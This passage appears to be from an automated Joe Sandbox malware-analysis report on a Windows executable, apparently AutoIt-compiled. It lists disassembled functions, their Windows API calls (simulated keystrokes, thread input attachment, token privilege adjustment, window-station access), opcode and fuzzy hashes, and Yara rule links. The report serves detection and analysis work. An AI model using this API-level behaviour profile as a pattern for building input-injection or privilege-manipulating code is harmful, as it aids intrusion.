                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 1fa03516cdb0fc2c6e712fcd2225202efaf2b56abc9982e3f340fb1a8a3e1efc
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: F131F270A001469FC768DF4AC484A69F7A6FB49300B7487A5E80AEB351DBB1EDC1DBC1
                                                        Function 000FFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 101ba95aa3520aaad51d4e1fc961be2d75585eaceeb1e15c5402516694e2bf96
                                                        • Instruction ID: 18c756e59d8b4503a27ccca3fba8894edac8bc9d3e23bc1146da322ba53bbf81
                                                        • Opcode Fuzzy Hash: 101ba95aa3520aaad51d4e1fc961be2d75585eaceeb1e15c5402516694e2bf96
                                                        • Instruction Fuzzy Hash: 1C4127746043458FDB24DF14C488F2ABBE1BF45318F0988ACE99A9B762C772E845CF52
                                                        Function 000C7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 55c34718f475b0df5fb6ea5aba8b9f995f55db96df2a059297daf80575ef0f9f
                                                        • Instruction ID: 300745ec808cef93f4476ec3c8df900bf5d4997ff38ff351dc3c105a8620f9d7
                                                        • Opcode Fuzzy Hash: 55c34718f475b0df5fb6ea5aba8b9f995f55db96df2a059297daf80575ef0f9f
                                                        • Instruction Fuzzy Hash: 8A210672A04A4DEBDB248F25EC41BBD7BB4FB54350F21842EF58AC55A0EB7085D0EB85
                                                        Function 000E06FE Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b22bcdffab5cca09017806b2d44b5eebad8bcb3405c1437bf388a3fca2aaa8c
                                                        • Instruction ID: 0ce5d9b374573f522fa46f723da7a7566054b6058e5ae702defb2c30eb68416a
                                                        • Opcode Fuzzy Hash: 6b22bcdffab5cca09017806b2d44b5eebad8bcb3405c1437bf388a3fca2aaa8c
                                                        • Instruction Fuzzy Hash: 492107354083409FC7729B34AD42AD6BBE4EB41310B0945AEFC44D7953E7A44D958FA1
                                                        Function 000C4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 000C4BEF
                                                          • Part of subcall function 000E525B: __wfsopen.LIBCMT ref: 000E5266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E0F
                                                          • Part of subcall function 000C4B6A: FreeLibrary.KERNEL32(00000000), ref: 000C4BA4
                                                          • Part of subcall function 000C4C70: _memmove.LIBCMT ref: 000C4CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 461aa48b16003bff0b5e314c8eec52bbaa6d7ceb2fb9145f375d5b38eb689642
                                                        • Instruction ID: 28051ec98fcca194d65cee7f3598578f46e46a8bd4fe4eae282b1c8e0a86370c
                                                        • Opcode Fuzzy Hash: 461aa48b16003bff0b5e314c8eec52bbaa6d7ceb2fb9145f375d5b38eb689642
                                                        • Instruction Fuzzy Hash: 6C11C131600209ABCF24AFB0C826FEE77A9BF44750F11882DF942A7182EB719A019B51
                                                        Function 000FFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 61a05c70ac79a4ea0dee2317d163225e4c56682ca419c7236b53044f195a8cde
                                                        • Instruction ID: c1905f633314711c3377002059ddaa36fc83332ec6c3012f153c8565c59f7968
                                                        • Opcode Fuzzy Hash: 61a05c70ac79a4ea0dee2317d163225e4c56682ca419c7236b53044f195a8cde
                                                        • Instruction Fuzzy Hash: DF21FDB4A083459FCB24DF24C484F5ABBE0BF89318F05896CF98A57762D731E845CB92
                                                        Function 000E4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 000E48A6
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 1250aae9fb2687acf0905aae7f82faf0fc633859ffd8a6d4d167d49f184004a0
                                                        • Instruction ID: 6cf1addf11754c46bf409e255f0e63dd6dd6ddc5bfecd119eecf69a7d42fa674
                                                        • Opcode Fuzzy Hash: 1250aae9fb2687acf0905aae7f82faf0fc633859ffd8a6d4d167d49f184004a0
                                                        • Instruction Fuzzy Hash: 00F0AF31901689AFDF51AFA68D067EE36A1AF01325F158414F428BA1D3CF788951DB51
                                                        Function 000C4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 396b4240213a4c8879d76f5ec10bd966ddace086b3d5ca718421a22384f3bc5d
                                                        • Instruction ID: 7fb4f5cdaf78d5eaff73a3eb3c3b6cd0bcda1f0f25c3371b201ec30c0ce8bdd2
                                                        • Opcode Fuzzy Hash: 396b4240213a4c8879d76f5ec10bd966ddace086b3d5ca718421a22384f3bc5d
                                                        • Instruction Fuzzy Hash: 2EF03971505711CFCB349F64E8A4D5ABBF1BF143293228A3EE1DA82621C7329880DF40
                                                        Function 000E0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E07B0
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: cd20d8804e991dbd58b05727e57351c8f2944bd36d4f684e72cc0f9cd12954eb
                                                        • Instruction ID: 96c2cdb31f506b4e1e1d6a7ffc871f96f43e358cf718ce93537098feed226ae3
                                                        • Opcode Fuzzy Hash: cd20d8804e991dbd58b05727e57351c8f2944bd36d4f684e72cc0f9cd12954eb
                                                        • Instruction Fuzzy Hash: 14E0CD769051285BC721D65C9C05FFA77DDDF897A0F0441B5FD0CD7315D9A1AC8186D0
                                                        Function 000E525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: d5ffe0fb3bcc365817c59b4d5f08e9065cb573e2a5abe9322bc025a17d94a1c4
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: A0B0927644020C7BCE012A82EC02A893B199B46768F408021FB0C2C162A673A6649A89
                                                        Function 014CECB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 014CECC1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 947d05092a66dc2c0f51e4716a944aefffa8d934229ede8947a3e4345ea04a38
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 7AE0E67494010DDFDB00EFB4D6496AE7FB4EF04701F100165FD01E2281D7319E509A62

                                                        Non-executed Functions

                                                        Function 0014CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0014CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0014CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0014CC00
                                                        • SendMessageW.USER32 ref: 0014CC29
                                                        • _wcsncpy.LIBCMT ref: 0014CC95
                                                        • GetKeyState.USER32(00000011), ref: 0014CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0014CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0014CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0014CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0014CD0C
                                                        • SendMessageW.USER32 ref: 0014CD33
                                                        • SendMessageW.USER32(?,00001030,?,0014B348), ref: 0014CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0014CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0014CE60
                                                        • SetCapture.USER32(?), ref: 0014CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0014CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0014CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0014CEF5
                                                        • ReleaseCapture.USER32 ref: 0014CF00
                                                        • GetCursorPos.USER32(?), ref: 0014CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0014CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0014CFA3
                                                        • SendMessageW.USER32 ref: 0014CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0014D00E
                                                        • SendMessageW.USER32 ref: 0014D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0014D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0014D06D
                                                        • GetCursorPos.USER32(?), ref: 0014D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0014D09A
                                                        • GetParent.USER32(?), ref: 0014D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0014D123
                                                        • SendMessageW.USER32 ref: 0014D154
                                                        • ClientToScreen.USER32(?,?), ref: 0014D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0014D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0014D20C
                                                        • SendMessageW.USER32 ref: 0014D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0014D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0014D2B5
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3977979337-4164748364
                                                        • Opcode ID: e061df55b6dd13e46c8a37c6649904a37f3ca6c93f5c68581521da7622238bf9
                                                        • Instruction ID: a45f5d4145944031a30c37c49d3f223b58df436cea30a76fbdeac455d848736f
                                                        • Opcode Fuzzy Hash: e061df55b6dd13e46c8a37c6649904a37f3ca6c93f5c68581521da7622238bf9
                                                        • Instruction Fuzzy Hash: 0142AB78205241AFDB24CF24CC88EAABBE6FF49350F14052DF659972B1C731D981DB92
                                                        Function 000D6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                        • API String ID: 1357608183-4066018314
                                                        • Opcode ID: dbd854f1ca048dd61e3dbc68acfca7fc87afca8ea6d12518e4ad5f9afaa004af
                                                        • Instruction ID: 1d35790f12c021db9aa2a718b01287813fff818b1ef163443e0ff581e4a8c1dd
                                                        • Opcode Fuzzy Hash: dbd854f1ca048dd61e3dbc68acfca7fc87afca8ea6d12518e4ad5f9afaa004af
                                                        • Instruction Fuzzy Hash: 1E93A271A04215DBDB28CF98C8817EDB7B1FF48710F25816AE959AB385E7709EC1CB50
                                                        Function 000C48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 000C48DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000FD665
                                                        • IsIconic.USER32(?), ref: 000FD66E
                                                        • ShowWindow.USER32(?,00000009), ref: 000FD67B
                                                        • SetForegroundWindow.USER32(?), ref: 000FD685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000FD69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 000FD6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FD6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000FD6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000FD6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 000FD6CF
                                                        • SetForegroundWindow.USER32(?), ref: 000FD6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD719
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD71E
                                                        • SetForegroundWindow.USER32(?), ref: 000FD721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 000FD748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 1c98c06400b03f656eb5929ede7ad0a3cfba9d42a7ed9595e8e086c9167f8d64
                                                        • Instruction ID: c03d3d63012727cdf94af7a0f282687820aa7eb0294e71ec3e48add1cea48690
                                                        • Opcode Fuzzy Hash: 1c98c06400b03f656eb5929ede7ad0a3cfba9d42a7ed9595e8e086c9167f8d64
                                                        • Instruction Fuzzy Hash: 1D319775A4031C7AEB206F619C49F7F7E6DEB45B50F104029FA04EA6E1D6705842AAA0
                                                        Function 00118310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 001187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                          • Part of subcall function 001187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                          • Part of subcall function 001187E1: GetLastError.KERNEL32 ref: 00118865
                                                        • _memset.LIBCMT ref: 00118353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001183A5
                                                        • CloseHandle.KERNEL32(?), ref: 001183B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001183CD
                                                        • GetProcessWindowStation.USER32 ref: 001183E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 001183F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0011840A
                                                          • Part of subcall function 001181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00118309), ref: 001181E0
                                                          • Part of subcall function 001181CB: CloseHandle.KERNEL32(?,?,00118309), ref: 001181F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: 97c1dcde9541550226fe0f86a15e58f29c1e7f61cbe2bc49ee087305e950646c
                                                        • Instruction ID: 5c33b4fdc0f3e27d3b330bd2c1793b4a16ed7b227e6c4969414bc59376f1bb07
                                                        • Opcode Fuzzy Hash: 97c1dcde9541550226fe0f86a15e58f29c1e7f61cbe2bc49ee087305e950646c
                                                        • Instruction Fuzzy Hash: 77819B71900249BFDF15DFA4CC49AEE7BBAFF05304F148169F914A62A1EB318E95DB20
                                                        Function 0012C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0012C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C81D
